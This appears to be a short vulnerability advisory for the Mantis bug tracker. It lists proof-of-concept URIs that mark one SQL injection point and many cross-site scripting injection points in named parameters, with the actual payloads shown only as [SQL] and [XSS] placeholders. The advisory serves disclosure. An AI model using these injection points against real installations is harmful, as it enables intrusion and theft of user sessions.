|
Mantis Multiple Input Validation Vulnerabilities
An exploit is not required. The following proof-of-concept URIs are available: http://www.example.com/manage_user_page.php?sort=last_visit'[SQL] http://www.example.com/view_all_set.php?type=1&handler_id=1&hide_status=[XSS] http://www.example.com/view_all_set.php?type=1&handler_id=[XSS] http://www.example.com/view_all_set.php?type=1&temporary=y&user_monitor=[XSS] http://www.example.com/view_all_set.php?type=1&temporary=y&reporter_id=[XSS] http://www.example.com/view_all_set.php?type=6&view_type=[XSS] http://www.example.com/view_all_set.php?type=1&show_severity=[XSS] http://www.example.com/view_all_set.php?type=1&show_category=[XSS] http://www.example.com/view_all_set.php?type=1&show_status=[XSS] http://www.example.com/view_all_set.php?type=1&show_resolution=[XSS] http://www.example.com/view_all_set.php?type=1&show_build=[XSS] http://www.example.com/view_all_set.php?type=1&show_profile=[XSS] http://www.example.com/view_all_set.php?type=1&show_priority=[XSS] http://www.example.com/view_all_set.php?type=1&highlight_changed=[XSS] http://www.example.com/view_all_set.php?type=1&relationship_type=[XSS] http://www.example.com/view_all_set.php?type=1&relationship_bug=[XSS] http://www.example.com/manage_user_page.php?sort=[XSS] http://www.example.com/view_filters_page.php?view_type=[XSS] http://www.example.com/proj_doc_delete.php?file_id=1&title=[XSS] |
|
|
Privacy Statement |